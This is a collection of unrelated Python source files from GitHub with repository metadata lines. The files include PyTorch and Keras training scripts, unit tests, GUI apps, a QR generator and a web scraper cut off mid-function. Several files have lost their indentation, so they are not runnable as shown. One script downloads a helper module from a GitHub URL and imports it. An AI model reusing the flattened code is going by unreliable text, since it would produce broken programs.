    def forward(self, x):
        """Return one raw logit per sample (shape: [batch, 1])."""
        hidden = self.layer1(x)
        return self.layer2(hidden)
# # another way to create the model is
# model = nn.Sequential(
# nn.Linear(in_features=2, out_features=10),
# nn.Linear(in_features=10, out_features=1)
# ).to(device)
# with ReLU activations
class BinaryClassification_v02(nn.Module):
    """Three-layer MLP with ReLU activations for the circles data.

    The two hidden ReLU layers let the network learn the non-linear
    (circular) decision boundary; the head emits a single raw logit.
    """

    def __init__(self):
        super().__init__()
        self.layer1 = nn.Linear(2, 10)
        self.layer2 = nn.Linear(10, 10)
        self.layer3 = nn.Linear(10, 1)
        self.relu = nn.ReLU()

    def forward(self, x):
        """Return one raw logit per sample (shape: [batch, 1])."""
        out = self.relu(self.layer1(x))
        out = self.relu(self.layer2(out))
        return self.layer3(out)
# creating an instance of the model and sending to cuda as well
model_0 = BinaryClassification_v01().to(device) # with only linear
print(f"Model: {model_0}")
# lets pass the data through the model before it has been trained on anything
untrained_preds = model_0(X_test.to(device))
print(f"y_test[:10]: {y_test[:10]}")
print(f"untrained_pred[:10]: {untrained_preds[:10].squeeze()}")
# Accuracy method to determine accuracy of the model
def accuracy_fn(y_true, y_preds):
    """Return the percentage of predictions that match the targets.

    Args:
        y_true: tensor of ground-truth labels.
        y_preds: tensor of predicted labels, same shape as ``y_true``.

    Returns:
        float in [0, 100]. Empty input yields 0.0 instead of raising
        ZeroDivisionError.
    """
    total = len(y_preds)
    if total == 0:
        return 0.0
    # .sum() on the boolean tensor runs in C; the original iterated the
    # tensor element-by-element with Python's built-in sum().
    correct = torch.eq(y_preds, y_true).sum().item()
    return (correct / total) * 100
# lets setup the loss function and optimizer for training
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.SGD(model_0.parameters(),
lr=0.01)
# Train the model
torch.manual_seed(69)
torch.cuda.manual_seed(69)
# sending the data to the device (cuda)
X_train, y_train = X_train.to(device), y_train.to(device)
X_test, y_test = X_test.to(device), y_test.to(device)
epochs = 100
for epoch in range(epochs):
model_0.train() # setting the model to train mode
# 1. Forward pass
y_logits = model_0(X_train).squeeze()# the model returns the logits since loss function is BCE with logits
y_preds = torch.round(torch.sigmoid(y_logits)) # logits -> probabilties -> turning to 0 or 1
# 2. Calculating loss
loss = loss_fn(y_logits, y_train)
acc = accuracy_fn(y_train, y_preds)
# 3. Setting grad to zero
optimizer.zero_grad()
# 4. Backpropagation
loss.backward()
# 5. Optimizer step
optimizer.step()
## Testing
model_0.eval() # setting the model to evaluation mode
with torch.inference_mode():
# Forward pass
test_logits = model_0(X_test).squeeze()
test_preds = torch.round(torch.sigmoid(test_logits))
# Calculate loss and accuracy
test_loss = loss_fn(test_logits, y_test)
test_acc = accuracy_fn(y_true=y_test,
y_preds=test_preds)
# printing
if epoch % 10 ==0:
print(f"Epoch: {epoch} | loss: {loss:.5f} | Accuracy: {acc:.2f} | Test loss: {test_loss:.5f} | Test accuracy: {test_acc:.2f} ")
# BinaryClassification_v01 doesnt seem to do anything. The accuracy is 50%.
# Downloading helper functions to plot the decision boundary made by this model
if Path("helper_functions.py").is_file(): # if the file containing helper functions already exists
print("The file already exists")
else:
request = requests.get("https://raw.githubusercontent.com/mrdbourke/pytorch-deep-learning/main/helper_functions.py") # getting the file from this url
with open("helper_functions.py", "wb") as f: # creating a file with the name
f.write(request.content) # writing the contents of the request to the file
from helper_functions import plot_predictions, plot_decision_boundary
plt.figure(figsize=(12,6))
plt.subplot(1,2,1)
plt.title("Train")
plot_decision_boundary(model_0, X_train, y_train)
plt.subplot(1,2,2)
plt.title("Test")
plot_decision_boundary(model_0, X_test, y_test)
plt.show()
model_1 = BinaryClassification_v02().to(device)
print(f"Model: {model_1}")
loss_fn = nn.BCEWithLogitsLoss()
optimizer = torch.optim.Adam(model_1.parameters(), # Adam works wayyy better than just SGD
lr=0.1)
# Training the model
epochs = 1000
for epoch in range(epochs):
model_1.train()
y_logits = model_1(X_train).squeeze()
y_preds = torch.round(torch.sigmoid(y_logits))
loss = loss_fn(y_logits, y_train)
acc = accuracy_fn(y_true=y_train,
y_preds=y_preds)
optimizer.zero_grad()
loss.backward()
optimizer.step()
model_1.eval()
with torch.inference_mode():
test_logits = model_1(X_test).squeeze()
test_preds = torch.round(torch.sigmoid(test_logits))
test_loss = loss_fn(test_logits, y_test)
test_acc = accuracy_fn(y_true=y_test,
y_preds=test_preds)
if epoch % 100 ==0:
print(f"Epoch: {epoch} | loss: {loss:.5f} | accuracy: {acc:.2f} | Test loss: {test_loss:.5f} | Test accuracy: {test_acc:.2f}")
plt.figure(figsize=(12,6))
plt.subplot(1,2,1)
plt.title("Train")
plot_decision_boundary(model_1, X_train, y_train)
plt.subplot(1,2,2)
plt.title("Test")
plot_decision_boundary(model_1, X_test, y_test)
plt.show() | puklu/Deep-Learning-PyTorch- | Practice/01_Binary_Classification/main.py | main.py | py | 6,970 | python | en | code | 0 | github-code | 13 |
9844827255 | # -*- coding: utf-8 -*-
import pytest
from raiden.mtree import merkleroot, check_proof, get_proof, NoHash32Error
from raiden.utils import keccak
def test_empty():
assert merkleroot([]) == ''
assert merkleroot(['']) == ''
def test_multiple_empty():
assert merkleroot(['', '']) == ''
def test_non_hash():
with pytest.raises(NoHash32Error):
merkleroot(['not32bytes', 'neither'])
def test_single():
hash_0 = keccak('x')
assert merkleroot([hash_0]) == hash_0
def test_duplicates():
hash_0 = keccak('x')
hash_1 = keccak('y')
assert merkleroot([hash_0, hash_0]) == hash_0, 'duplicates should be removed'
result0 = merkleroot([hash_0, hash_1, hash_0])
result1 = merkleroot([hash_0, hash_1])
assert result0 == result1, 'duplicates should be removed'
def test_one():
hash_0 = 'a' * 32
merkle_tree = [hash_0]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == []
assert merkle_root == hash_0
assert check_proof(merkle_proof, merkle_root, hash_0) is True
def test_two():
hash_0 = 'a' * 32
hash_1 = 'b' * 32
merkle_tree = [hash_0, hash_1]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_1]
assert merkle_root == keccak(hash_0 + hash_1)
assert check_proof(merkle_proof, merkle_root, hash_0)
merkle_proof = get_proof(merkle_tree, hash_1)
merkle_root = merkleroot(merkle_tree)
assert merkle_proof == [hash_0]
assert merkle_root == keccak(hash_0 + hash_1)
assert check_proof(merkle_proof, merkle_root, hash_1)
def test_three():
    """Three leaves: the odd leaf is paired with the (0,1) inner hash.

    (The unused local helper ``sort_join`` from the original was dead
    code and has been removed.)
    """
    hash_0 = 'a' * 32
    hash_1 = 'b' * 32
    hash_2 = 'c' * 32

    merkle_tree = [hash_0, hash_1, hash_2]

    # Precomputed keccak(hash_0 + hash_1), pinned as raw bytes.
    hash_01 = (
        b'me\xef\x9c\xa9=5\x16\xa4\xd3\x8a\xb7\xd9\x89\xc2\xb5\x00'
        b'\xe2\xfc\x89\xcc\xdc\xf8x\xf9\xc4m\xaa\xf6\xad\r['
    )
    assert keccak(hash_0 + hash_1) == hash_01

    calculated_root = keccak(hash_2 + hash_01)

    merkle_proof = get_proof(merkle_tree, hash_0)
    merkle_root = merkleroot(merkle_tree)
    assert merkle_proof == [hash_1, hash_2]
    assert merkle_root == calculated_root
    assert check_proof(merkle_proof, merkle_root, hash_0)

    merkle_proof = get_proof(merkle_tree, hash_1)
    merkle_root = merkleroot(merkle_tree)
    assert merkle_proof == [hash_0, hash_2]
    assert merkle_root == calculated_root
    assert check_proof(merkle_proof, merkle_root, hash_1)

    merkle_proof = get_proof(merkle_tree, hash_2)
    merkle_root = merkleroot(merkle_tree)
    # with an odd number of values, the last value wont appear by itself in the
    # proof since it isn't hashed with another value
    assert merkle_proof == [keccak(hash_0 + hash_1)]
    assert merkle_root == calculated_root
    assert check_proof(merkle_proof, merkle_root, hash_2)
def test_get_proof():
hash_0 = 'a' * 32
hash_1 = 'b' * 32
merkle_tree = [hash_0, hash_1]
merkle_proof = get_proof(merkle_tree, hash_0)
merkle_root = merkleroot(merkle_tree)
assert check_proof(merkle_proof, merkle_root, hash_0)
second_merkle_proof = get_proof(merkle_tree, hash_0, merkle_root)
assert check_proof(second_merkle_proof, merkle_root, hash_0)
assert merkle_proof == second_merkle_proof
def test_many(tree_up_to=10):
for number_of_leaves in range(tree_up_to):
merkle_tree = [
keccak(str(value))
for value in range(number_of_leaves)
]
for value in merkle_tree:
merkle_proof = get_proof(merkle_tree, value)
merkle_root = merkleroot(merkle_tree)
second_proof = get_proof(merkle_tree, value, merkle_root)
assert check_proof(merkle_proof, merkle_root, value) is True
assert check_proof(second_proof, merkle_root, value) is True
assert merkleroot(merkle_tree) == merkleroot(reversed(merkle_tree))
| utzig/raiden | raiden/tests/unit/test_mtree.py | test_mtree.py | py | 4,055 | python | en | code | null | github-code | 13 |
24415142310 | from unittest import TestCase
from walkoff.messaging import WorkflowAuthorization
class TestWorkflowAuthorization(TestCase):
    """Unit tests for WorkflowAuthorization's user/role checks and user stack."""

    def test_is_authorized(self):
        """Any listed user or role authorizes; unknown pairs do not."""
        user_ids = [1, 2, 3]
        role_ids = [3, 4]
        authorization = WorkflowAuthorization(user_ids, role_ids)
        for user_id in user_ids:
            self.assertTrue(authorization.is_authorized(user_id, 3))
        for role_id in role_ids:
            self.assertTrue(authorization.is_authorized(1, role_id))
        self.assertFalse(authorization.is_authorized(4, 5))
        self.assertFalse(authorization.is_authorized(10, 10))

    def test_add_authorized_users(self):
        """Users and roles added later authorize exactly like the originals."""
        user_ids = [1, 2, 3]
        role_ids = [3, 4]
        authorization = WorkflowAuthorization(user_ids, role_ids)
        extra_users = [5, 6]
        extra_roles = [1, 2]
        authorization.add_authorizations(extra_users, extra_roles)
        for user_id in user_ids + extra_users:
            self.assertTrue(authorization.is_authorized(user_id, 3))
        for role_id in role_ids + extra_roles:
            self.assertTrue(authorization.is_authorized(1, role_id))

    def test_append_user(self):
        """peek_user reflects the most recently appended user."""
        authorization = WorkflowAuthorization([1, 2, 3], [3, 4])
        authorization.append_user(1)
        self.assertEqual(authorization.peek_user(), 1)
        authorization.append_user(5)
        self.assertEqual(authorization.peek_user(), 5)

    def test_pop_user(self):
        """pop_user returns appended users in LIFO order."""
        authorization = WorkflowAuthorization([1, 2, 3], [3, 4])
        authorization.append_user(1)
        authorization.append_user(5)
        self.assertEqual(authorization.pop_user(), 5)
        self.assertEqual(authorization.pop_user(), 1)
| xa7YvcR3/WALKOFF | tests/test_workflow_authorization.py | test_workflow_authorization.py | py | 1,515 | python | en | code | null | github-code | 13 |
29045224023 | import numpy as np
import os
from typing import List
import tensorflow.keras.models as models
from model import State
from agents import Agent
ThreeDimArr = List[List[List[int]]]
Board = List[List[int]]
# Agent that uses a neural network to (attempt to) compute the optimal move
class NeuralNetworkAgent(Agent):
def __init__(self, model_name: str = '1000_normalized.h5') -> None:
dir_path = os.path.dirname(os.path.realpath(__file__))
self.model = models.load_model(f'{dir_path}/models/{model_name}')
def evaluate(self, state: State) -> int:
board_3d = self.__reshape_board(state)
board_3d = np.expand_dims(board_3d, 0)
return self.model(board_3d)[0][0]
def __reshape_board(self, state: State) -> ThreeDimArr:
board = state.board
board_3d = np.zeros((4, State.SIZE, State.SIZE), dtype=np.int8)
# 3rd dimension - black, white, valid move, vulnerable disk
# black, white
for row_index, row in enumerate(board):
for col_index, cell in enumerate(row):
if cell == State.BLACK:
board_3d[0][row_index][col_index] = 1
elif cell == State.WHITE:
board_3d[1][row_index][col_index] = 1
# valid moves
valid_moves = state.valid_moves()
for row_index, col_index in valid_moves:
board_3d[2][row_index][col_index] = 1
# vulnerable disks
for row_index in range(State.SIZE):
for col_index in range(State.SIZE):
if state.is_disk_vulnerable((row_index, col_index)):
board_3d[3][row_index][col_index] = 1
return board_3d
def __str__(self) -> str:
return "Neural Network"
| chromium-52/reversi-ai | src/deepLearningAgents.py | deepLearningAgents.py | py | 1,761 | python | en | code | 0 | github-code | 13 |
3079789295 | # Import libraries
import re
import pandas as pd
from keras import Sequential
from keras.callbacks import TensorBoard
from keras.constraints import maxnorm
from keras.layers import Embedding, Conv1D, Dropout, MaxPooling1D, Flatten, Dense
from keras.optimizers import SGD
from keras.utils import to_categorical
from keras_preprocessing.sequence import pad_sequences
from keras_preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
import matplotlib.pyplot as plt
# Loading movie review sentiments data
testMovie_df = pd.read_csv('test.tsv', delimiter='\t', encoding='utf-8')
trainMovie_df = pd.read_csv('train.tsv', delimiter='\t', encoding='utf-8')
# Keeping only the necessary columns - cleaning the data set
trainMovie_df = trainMovie_df.drop(columns=['PhraseId', 'SentenceId'])
testMovie_df = testMovie_df.drop(columns=['PhraseId', 'SentenceId'])
trainMovie_df['Phrase'] = trainMovie_df['Phrase'].apply(lambda x: re.sub('[^a-zA-z0-9\s]', '', x.lower()))
testMovie_df['Phrase'] = testMovie_df['Phrase'].apply(lambda x: re.sub('[^a-zA-z0-9\s]', '', x.lower()))
# Tokenise phrases into integer sequences and pad them to uniform length.
max_features = 2000
tokenizer = Tokenizer(num_words=max_features, split=' ')
tokenizer.fit_on_texts(trainMovie_df['Phrase'].values)
X_train = tokenizer.texts_to_sequences(trainMovie_df['Phrase'].values)
X_train = pad_sequences(X_train)
# NOTE(review): fitting again on the test set extends the vocabulary with
# test-only words; normally the tokenizer is fit on training data alone.
tokenizer.fit_on_texts(testMovie_df['Phrase'].values)
X_test = tokenizer.texts_to_sequences(testMovie_df['Phrase'].values)
# Bug fix: the original called pad_sequences(X_train) here, silently
# replacing the test matrix with the training matrix.
X_test = pad_sequences(X_test)
print("handing data")
# Creating the model
embed_dim = 256
lstm_out = 156
# Design the model using classification
# Model defined
model = Sequential()
# Input layer of the model for processing
model.add(Embedding(max_features, embed_dim, input_length=X_train.shape[1]))
# Convolutional layer
model.add(Conv1D(256, (5), activation='relu', padding='same', kernel_constraint=maxnorm(3)))
model.add(MaxPooling1D(5))
# Flatten layer
model.add(Flatten())
model.add(Dense(512, activation='relu', kernel_constraint=maxnorm(3)))
model.add(Dropout(0.5))
# Output layer
model.add(Dense(5, activation='softmax'))
# Compile the model identified
sgd = SGD(lr=0.01, momentum=0.9, decay=0.01 / 15, nesterov=False)
model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])
# Identify the data into training and test sets
label_encoder = LabelEncoder()
integer_encoded = label_encoder.fit_transform(trainMovie_df['Sentiment'])
Y_train = to_categorical(integer_encoded)
x_train, x_test, y_train, y_test = train_test_split(X_train, Y_train, test_size=0.3, random_state=30)
# Fitting the model identified using the training data set
history = model.fit(x_train, y_train, epochs=2, batch_size=500, validation_data=(x_test, y_test))
# Evaluation of the results of the model obtained using the test data set
[test_loss, test_acc] = model.evaluate(x_test, y_test)
print("Evaluation result on Test Data : Loss = {}, accuracy = {}".format(test_loss, test_acc))
# Listing all the components of data present in history
print('The data components present in history are', history.history.keys())
# Graphical evaluation of accuracy associated with training and validation data
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Evaluation of Data Accuracy')
plt.xlabel('epoch')
plt.ylabel('Accuracy of Data')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Graphical evaluation of loss associated with training and validation data
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('Loss of Data')
plt.title('Evaluation of Data Loss')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Visualization of the model using tensor board
tbCallBack = TensorBoard(log_dir='./lab2_1', histogram_freq=0, write_graph=True, write_images=True)
# Fitting the model defined using the training data along with validation using test data
history = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=2, verbose=0, initial_epoch=0)
# Evaluation of the loss and accuracy associated to the test data set
[test_loss, test_acc] = model.evaluate(x_test, y_test)
print("Evaluation result on Test Data using Tensorflow : Loss = {}, accuracy = {}".format(test_loss, test_acc))
# Listing all the components of data present in history
print('The data components present in history using Tensorflow are', history.history.keys())
# Graphical evaluation of accuracy associated with training and validation data
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Evaluation of Data Accuracy using Tensorflow')
plt.xlabel('epoch')
plt.ylabel('Accuracy of Data')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show()
# Graphical evaluation of loss associated with training and validation data
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('Loss of Data')
plt.title('Evaluation of Data Loss using Tensorflow')
plt.legend(['TrainData', 'ValidationData'], loc='upper right')
plt.show() | adtmv7/CS5590-490-Python-Deep-Learning | LAB2/Source/4_text_cnn.py | 4_text_cnn.py | py | 5,299 | python | en | code | 2 | github-code | 13 |
21552877216 | '''
accountTab class UI tab Accounting
statisticTab class UI tab Statistics
settingTab class UI tab Settings
mainTab class UI tab with all tabs
'''
import PySimpleGUI as sg
from logic import *
class accountTab(takeData):
def __init__(self):
super().__init__()
def accountLayout(self):
#self.rerq = [123, 321, 999]
#self.rer = self.checkData(self.rerq)
self.Layout = [[
sg.Text('Amount:', size=(6, 1)),
sg.InputText(key='_AMOUNT_', size=(12, 1)),
sg.Radio('Profit', "group1", default=True, size=(4, 1), key='_Plus_'),
sg.Radio('Expenses', "group1", default=False, size=(8, 1), key='_Loss_'),
sg.Combo((self.takeCategory()), key='_CATEGORY_', size=(12, 1), readonly=True),
sg.Button('Added')],
[
sg.Listbox(values=(self.viewHistory()), size=(70, 14), key='_HISTORY_', background_color='Light Gray')]
]
return self.Layout
class statisticTab(statistic):
def __init__(self):
super().__init__()
def statisticLayout(self):
self.Layout = [[
sg.Multiline(self.takeMainStat(), size=(70, 13), key='_ALLSTAT_', background_color='Light Gray', disabled=True),],
[
sg.Text('Big +: use filter', key='_US1_', size=(21, 1)), sg.Text('Big -: use filter', key='_US2_', size=(21, 1)), sg.Text('BS: use filter', key='_US3_', size=(15, 1))
],
[
sg.Text('From:', size=(4, 1)), sg.InputText(default_text=datetime.date.today(), key='_DATE1_', size=(12, 1)), sg.Text('to:', size=(2, 1)), sg.InputText(default_text=datetime.date.today(), key='_DATE2_', size=(12, 1)), sg.Button('Filter'), sg.Button('Graph', key='_GRAPH_')
]
]
return self.Layout
class settingTab:
def __init__(self):
super().__init__()
def settingLayout(self):
self.Layout = [[
sg.Text('Monthly balance: {}, change: '.format(self.takeBalance()[0]), size=(26, 1), key='_STRBALANCE_'),
sg.InputText(key='_BALANCE_', size=(13, 1)),
sg.Button('Change')
]]
return self.Layout
class mainTab(accountTab, statisticTab, settingTab):
    """Aggregates the three tab layouts into a single TabGroup layout."""

    def __init__(self):
        super().__init__()
        # NOTE(review): despite the name, this attribute holds the layout
        # list returned by mainLayout(), not an sg.Window instance.
        self.window = self.mainLayout()

    def mainLayout(self):
        """Build and cache the TabGroup layout combining all three tabs."""
        self.Layout = [
            [
                sg.TabGroup(
                    [[
                        sg.Tab('Accounting', self.accountLayout()),
                        sg.Tab('Statistics', self.statisticLayout()),
                        sg.Tab('Settings', self.settingLayout())
                    ]])
            ]
        ]
        return self.Layout

    def updAccountTab(self):
        """Refresh the history listbox in the Accounting tab.

        Bug fix: the original referenced an undefined global ``window``
        (guaranteed NameError at call time); the instance attribute is
        used instead. NOTE(review): ``self.window`` is currently a layout
        list, so ``.Element`` will still fail until a real sg.Window is
        stored there — confirm the intended wiring.
        """
        return self.window.Element('_HISTORY_').Update(values=('123', '321'))
42323715010 | import pyqrcode
import PySimpleGUI as sg
import random
def Text():
    """Prompt for a text/address/URL string and save it as a PNG QR code.

    The generated file gets a random 6-digit prefix; the confirmation
    popup reports the exact filename that was written.
    """
    layout2 = [[sg.Text('Enter text in QR code')],
               [sg.Input()],
               [sg.OK()]]
    window = sg.Window("text based qr").Layout(layout2)
    while True:
        event, values = window.read()
        if event is None:  # window closed: nothing to encode
            break
        if event == 'OK':
            qr = pyqrcode.create(values[0])
            # Bug fix: draw the random prefix once so the saved file and
            # the popup message refer to the same name (the original made
            # two independent randint() calls, producing different names).
            filename = f'{random.randint(100000,999999)} text.png'
            qr.png(filename, scale=8)
            sg.popup(f'the qr code is created with file name:- {filename}')
            break
def Info():
    """Collect contact details from a form and save them as a PNG QR code."""
    layout3 = [[sg.Text('Enter the following info')],
               [sg.Text('Name:- ')], [sg.Input()],
               [sg.Text('Organisation:- ')], [sg.Input()],
               [sg.Text('Email:- ')], [sg.Input()],
               [sg.Text('Phone no. :- ')], [sg.Input()],
               [sg.Text("Address:- ")], [sg.Input()],
               [sg.Text('website URL:- ')], [sg.Input()],
               [sg.OK()]]
    window = sg.Window('Info QR').Layout(layout3)
    while True:
        event, values = window.read()
        if event is None:  # window closed without submitting
            break
        if event == 'OK':
            # "Organistion" typo in the encoded payload fixed to match the
            # form label. The payload is intentionally left-aligned: the
            # triple-quoted string's literal newlines are part of the data.
            qr = pyqrcode.create(f'''name:- {values[0]}
Organisation:- {values[1]}
Email:- {values[2]}
Phone no.:- {values[3]}
Address:- {values[4]}
website:- {values[5]}''')
            # Bug fix: draw the random prefix once so the saved file and
            # the popup message refer to the same name (the original made
            # two independent randint() calls).
            filename = f'{random.randint(100000,999999)} info.png'
            qr.png(filename, scale=8)
            sg.popup(f'QR code created with file name :- {filename}')
            break
def option_selection():
    """Top-level menu: choose plain-text or contact-info QR generation."""
    layout = [[sg.Text("Select option")],
              [sg.Radio('Text/Address/URL', "QR"), sg.Radio('Info', 'QR')],
              [sg.OK()]]
    window = sg.Window("QR code Generator").Layout(layout)
    while True:
        event, values = window.read()
        if event is None:
            # Bug fix: the original fell through on window close and then
            # indexed ``values`` — crashing when it was None, or launching
            # the Info dialog the user never asked for.
            return
        if event == 'OK':
            break
    # First radio selected -> plain text flow, otherwise the info form.
    if values[0]:
        Text()
    else:
        Info()
option_selection()
1694431033 | # task 1: visualize a satellite image and shapefile using python
# task 2: descriptive analysis and acreage calculation
# import required libraries
from osgeo import gdal
from osgeo import ogr
import numpy as np
import math
from scipy.stats import mode
import os
import matplotlib.pyplot as plt
# --- Load the raster band and display it --------------------------------
img = gdal.Open(r'C:\Users\student\1.tif')
band = img.GetRasterBand(1)
# Read the band once; the original read it twice (redundant disk work).
rast_array = np.array(band.ReadAsArray())
plt.imshow(rast_array)

# --- Descriptive statistics ---------------------------------------------
# Bug fix: flatten() returns a new array — the original discarded its
# result. Keep the 1-D values for the histogram below.
flat_values = rast_array.flatten()
# min_val/max_val avoid shadowing the built-in min()/max() functions.
min_val = np.min(rast_array)
max_val = np.max(rast_array)
meanval = np.mean(rast_array)
medianval = np.median(rast_array)
sdval = np.std(rast_array)
varianceval = np.var(rast_array)
rangeval = max_val - min_val
print("mean:", meanval)
print("median:", medianval)  # typo "medain" fixed
print("sdval:", sdval)
print("varia:", varianceval)
print("range:", rangeval)
# Histogram over the flattened pixel values (2-D input would plot one
# histogram per column, which was clearly not the intent).
plt.hist(flat_values)
| jaypadariya/jay_class | crop1 jay.py | crop1 jay.py | py | 886 | python | en | code | 0 | github-code | 13 |
9525042555 | from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QIntValidator
from PyQt5.QtWidgets import QWidget
class SliderWidget(QWidget):
def __init__(self, parent, title):
super(QWidget, self).__init__(parent)
self.slider = QWidget()
self.slider.layout = QtWidgets.QHBoxLayout()
self.value = 0
self.slider.sliderInput = QtWidgets.QSlider(Qt.Horizontal)
self.slider.sliderInput.setFocusPolicy(Qt.StrongFocus)
self.slider.sliderInput.setTickPosition(QtWidgets.QSlider.TicksBothSides)
self.slider.sliderInput.setTickInterval(10)
self.slider.sliderInput.setSingleStep(1)
self.slider.sliderInput.valueChanged.connect(self.changed_slider)
self.slider.sliderlabel = QtWidgets.QLabel("00")
self.slider.sliderlabel.setFont(QFont("Sanserif", 10))
self.slider.layout.addWidget(self.slider.sliderlabel)
self.slider.layout.addWidget(self.slider.sliderInput)
# Layout of title and slider + value
self.layout = QtWidgets.QVBoxLayout()
self.title = QtWidgets.QLabel(title)
self.title.setFont(QFont("Sanserif", 12))
self.layout.addWidget(self.title)
self.layout.addLayout(self.slider.layout)
def changed_slider(self):
self.value = self.slider.sliderInput.value()
if self.value >= 10:
self.slider.sliderlabel.setText(str(self.value))
else:
self.slider.sliderlabel.setText(f'0{str(self.value)}')
class intInputWidget(QWidget):
def __init__(self, parent, title):
super(QWidget, self).__init__(parent)
self.layout = QtWidgets.QHBoxLayout()
self.intLabel = QtWidgets.QLabel(title)
self.intLabel.setFont(QFont("Sanserif", 12))
self.intInput = QtWidgets.QLineEdit(self)
self.intInput.setFixedWidth(40)
self.intInput.setValidator(QIntValidator())
self.layout.addWidget(self.intLabel)
self.layout.addWidget(self.intInput)
self.layout.addStretch(1)
| BaileyDalton007/Epidemic-Simulator | widgetTempletes.py | widgetTempletes.py | py | 2,066 | python | en | code | 1 | github-code | 13 |
13309757071 | from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import RedirectView
from expenses.views import *
urlpatterns = patterns('',
url(r'^groups/$', GroupList.as_view(), name='group_list'),
url(r'^groups/add/$', GroupCreate.as_view(), name='group_create'),
url(r'^groups/(?P<pk>\d+)/edit/$', GroupUpdate.as_view(), name='group_update'),
url(r'^groups/(?P<pk>\d+)/delete/$', GroupDelete.as_view(), name='group_delete'),
url(r'^invite/(?P<pk>\d+)/$', InviteCreate.as_view(), name='invite_create'),
url(r'^invite/(?P<pk>\d+)(?P<hash>[0-9a-f]{10})/$', InviteDetail.as_view(), name='invite_detail'),
url(r'^invite/(?P<pk>\d+)(?P<hash>[0-9a-f]{10})/accept/$', InviteAccept.as_view(), name='invite_accept'),
url(r'^(?P<group>\d+)/expenses/$', ExpenseList.as_view(), name='expense_list'),
url(r'^(?P<group>\d+)/expenses/add/$', ExpenseCreate.as_view(), name='expense_create'),
url(r'^(?P<group>\d+)/expenses/(?P<pk>\d+)/edit/$', ExpenseUpdate.as_view(), name='expense_update'),
url(r'^(?P<group>\d+)/expenses/(?P<pk>\d+)/delete/$', ExpenseDelete.as_view(), name='expense_delete'),
url(r'^(?P<group>\d+)/refund/add/$', RefundCreate.as_view(), name='refund_create'),
url(r'^(?P<group>\d+)/refund/add/(?P<pk>\d+)/delete/$', RefundDelete.as_view(), name='refund_delete'),
) | nicbou/billsplitter | expenses/urls.py | urls.py | py | 1,343 | python | en | code | 4 | github-code | 13 |
28000944504 | from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup
import re
from time import sleep
from dotenv import load_dotenv
import logging
import json
from settings.countries import alpha
load_dotenv()
logging.basicConfig(filename='footstats.log', filemode='a', level=logging.ERROR, format='%(asctime)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S %p')
html_parser = 'html.parser'
class Squad:
    """Container for one club's scraped identity and statistics.

    Attributes are filled in by ``get_squads`` / ``get_squad_infos``:
    ``name``/``id``/``governing_country``/``manager`` are strings (or
    None until scraped); ``stats`` and ``players`` are lists of dicts.
    """

    def __init__(self) -> None:
        # Bug fix: the original assigned the *type objects* (e.g.
        # ``self.name = str``) as placeholders; ``None`` is an actual
        # "not yet scraped" value.
        self.name = None
        self.id = None
        self.governing_country = None
        self.manager = None
        self.stats = []    # per-match stat dicts
        self.players = []  # player dicts
def parse_fields(entity, type) -> dict:
    """Coerce string stat fields of *entity* (in place) to int/float.

    Only keys flagged truthy in ``settings/meta.json`` under *type* are
    converted: '' becomes None, decimal-looking values become float, and
    everything else is parsed as int after stripping thousands commas and
    any trailing unit. Conversion errors are logged per-key and skipped.

    Args:
        entity: dict of scraped string fields; mutated and returned.
        type: table section key in meta.json (parameter name kept for
            backward compatibility although it shadows the builtin).

    Returns:
        The same *entity* dict.
    """
    # Bug fix: the original leaked the file handle by rebinding the name
    # right after open(); ``with`` guarantees it is closed.
    with open('./settings/meta.json') as meta_file:
        meta = json.load(meta_file).get(type)
    # Signed or digit-led values containing a decimal point become floats.
    pattern = r'^[-|+|\d]\d*\.'
    for key in list(entity.keys()):
        try:
            to_parse = entity.get(key)
            # Only convert fields flagged in the metadata for this table type.
            if meta.get(key):
                if to_parse == '':
                    entity[key] = None
                elif re.match(pattern, to_parse):
                    entity[key] = float(to_parse)
                else:
                    # Drop thousands separators and anything after the
                    # first space (units), then parse as int.
                    entity[key] = int(re.subn(r'\,', '', to_parse.split(' ')[0])[0])
        except Exception as error:
            logging.error(f'Erro ao converter campo: {error}')
    return entity
def get_squads(url) -> list:
    """Scrape the league page at *url* and return one dict per club.

    Each dict carries 'href' (relative club link), 'squad_id' (segment 3
    of that link) plus every ``data-stat`` cell of the overall-table row.
    Returns an empty list on HTTP errors or scraping exceptions (both are
    logged, never raised).
    """
    rsp = requests.request('GET',url)
    content = rsp.content
    squads = []
    if rsp.status_code<400:
        try:
            soup = BeautifulSoup(content, html_parser)
            # Only the "*_overall" league tables hold the squad rows.
            tables = soup.find_all(attrs={'class':'table_container', 'id': re.compile(r'.+_overall')})
            if tables:
                for table_overall in tables:
                    rows = table_overall.find_all('tr')
                    for row in rows:
                        squad = row.find(attrs={'data-stat':'squad'})
                        # Skip header cells (<th>) and rows without a club link.
                        # NOTE(review): a row with no 'squad' cell makes
                        # ``squad.name`` raise and aborts the whole table
                        # via the except below — confirm that is intended.
                        if not squad.name=='th' and squad.find('a'):
                            squad_link = squad.find('a')['href']
                            # Stat cells keyed by data-stat, leading whitespace stripped.
                            infos = {td['data-stat']: re.sub(r'^\s','',td.text) for td in row.find_all('td')}
                            # Dict with the squad's identity fields.
                            squad_info = {
                                'href': squad_link,
                                'squad_id': squad_link.split('/')[3]
                            }
                            squad_info.update(infos)
